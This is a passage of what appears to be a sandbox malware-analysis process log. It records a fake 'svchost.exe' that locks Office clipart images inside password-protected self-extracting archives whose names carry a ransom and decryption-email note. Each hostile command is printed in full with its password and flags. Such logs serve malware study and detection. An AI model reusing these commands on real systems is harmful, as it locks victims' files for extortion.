  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1420
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2132
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
